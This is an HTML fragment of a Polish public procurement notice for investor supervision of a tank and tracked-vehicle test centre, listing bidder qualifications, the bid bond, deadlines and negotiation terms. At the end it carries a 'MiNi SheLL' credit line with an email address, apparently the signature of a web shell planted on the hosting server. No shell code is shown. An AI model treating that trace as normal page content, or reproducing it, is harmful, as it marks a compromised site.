class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w koordynowaniu procesu inwestycyjnego (DKPI)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale V SWZ.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>	Zamawiający nie stawia warunku w powyższym zakresie<br/>4)	zdolności technicznej lub zawodowej:<br/>a)	Zamawiający uzna, że Wykonawca posiada zdolność techniczną lub zawodową jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) świadczył co najmniej w jednym procesie budowlanym usługę polegającą na koordynowaniu procesu budowlanego dotyczącego budowy lub przebudowy budynku, o wartości robót minimum 18 000 000,00 zł brutto, z podaniem wartości świadczonej usługi, jej przedmiotu, daty wykonania i podmiotu, na rzecz którego została wykonana oraz z załączeniem dowodów określających czy ta usługa została wykonana należycie. Informacje w tym zakresie należy przedstawić zgodnie z załącznikiem nr 6 do SWZ.<br/>b)	Zamawiający wymaga aby Wykonawca osobiście lub osoby przez niego wyznaczone do pełnienia funkcji inspektora nadzoru inwestorskiego posiadały ważne uprawnienia budowlane do wykonywania nadzoru inwestorskiego <br/>w branżach: <br/>- konstrukcyjno-budowlanej – inspektor tej branży będzie zarazem pełnił funkcję inspektora – koordynatora zespołu inspektorów nadzoru inwestorskiego,<br/>- architektonicznej,<br/>- elektrycznej,<br/>- sanitarnej,<br/>- teletechnicznej,<br/>- drogowej<br/>a także aktualne obowiązkowe ubezpieczenie OC. Informacja tym zakresie należy przedstawić zgodnie z załącznikiem nr 3 do SWZ.<br/>3.	Zamawiający, oceniając zdolność techniczną lub zawodową może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy, może mieć negatywny wpływ na realizację zamówienia.<br/>4.	Z treści załączonych dokumentów musi wynikać jednoznacznie, że Wykonawca spełnił ww. warunki.<br/>5.	Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub są one niekompletne lub zawierają błędy, Zamawiający wzywa Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że:<br/>a)	oferta wykonawcy podlega odrzuceniu bez względu na jej złożenie, uzupełnienie lub poprawienie lub<br/>b)	zachodzą przesłanki unieważnienia postępowania.<br/>6.	Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, lub podmiotowe środki dowodowe budzą wątpliwości Zamawiającego, może <br/>on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny spełniania przez wykonawcę warunków udziału w postępowaniu lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć Pełnomocnictwo lub inny dokument potwierdzający umocowanie do podpisania oferty pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym przez osobę/y umocowane do reprezentacji ujawnione we właściwym rejestrze; jeżeli oferta nie została podpisana przez osoby upoważnione lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do tych czynności, Zamawiający dopuszcza złożenie elektronicznej kopii pełnomocnictwa poświadczonej przez notariusza.<br/>2.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania oraz oświadczenie <br/>o spełnianiu warunków udziału w postępowaniu zgodnie z załącznikiem nr 3 do SWZ. <br/>3.	Informacje zawarte w oświadczeniu, o którym mowa w ust. 2, stanowią wstępne <br/>potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania oraz spełnia warunki udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy na potwierdzenie spełnienia warunków udziału w postępowaniu (składane na wezwanie):<br/>1)	wykaz usług wykonanych/wykonywanych w okresie ostatnich 5 lat przed terminem otwarcia ofert (a jeżeli okres prowadzenia działalności jest krótszy <br/>– w tym okresie), z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączy dowody, że usługi te zostały wykonane należycie. – załącznik nr 6 do SWZ.<br/>2)	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego <br/>w zakresie wykonywania nadzoru inwestorskiego w branżach: architektonicznej, konstrukcyjno-budowlanej, elektrycznej, sanitarnej, teletechnicznej, drogowej, tj. osób posiadających ważne uprawnienia do pełnienia nadzoru inwestorskiego oraz obowiązkowe ubezpieczenie OC. – załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy <br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawcę<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w wysokości 1,5% wartości zamówienia netto.<br/>2.	Wadium musi być wniesione przed upływem terminu składania ofert. Wykonawca zobowiązany jest wnieść wadium na cały okres związania ofertą.<br/>3.	W przypadku niewniesienia wadium, wniesienia go w sposób nieprawidłowy, nieutrzymywania wadium nieprzerwanie do upływu terminu związania ofertą lub złożenia wniosku o zwrot wadium przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>4.	Wadium może być wnoszone w następujących formach:<br/>1)	Pieniądzu, przelewem na rachunek bankowy Zamawiającego: <br/>92 1240 21481111 0000 30321021 Bank PKO S.A.<br/>2)	Gwarancjach bankowych;<br/>3)	Gwarancjach ubezpieczeniowych;<br/>4)	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2024 r. poz. 419).<br/>5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>6.	Jeżeli wadium zostanie wniesione w pieniądzu, Wykonawca dołącza do oferty potwierdzenie dokonania wpłaty wadium. Na poleceniu przelewu należy wpisać: „Wadium - postępowanie przetargowe na usługę pełnienia nadzoru inwestorskiego wraz <br/>z koordynacją procesu inwestycyjnego, nr sprawy PP 02/2024”.<br/>7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa ust. 4, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy, określa art. 98 ustawy Pzp.<br/>9.	Wzór gwarancji przetargowej stanowi Załącznik nr 10 do SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-26 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://witpis.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-26 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena,<br/>Doświadczenie w koordynowaniu procesu inwestycyjnego (DKPI) <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna nazwa postępowania o udzielenie zamówienia publicznego: <br/>Usługa pełnienia nadzoru inwestorskiego wraz z koordynacją procesu inwestycyjnego pn.: Budowa Centrum Badań Testowych Czołgów i Pojazdów Gąsienicowych w latach 2024-2027, w systemie &#34;ZAPROJEKTUJ I WYBUDUJ&#34;.

Creat By MiNi SheLL
Email: jattceo@gmail.com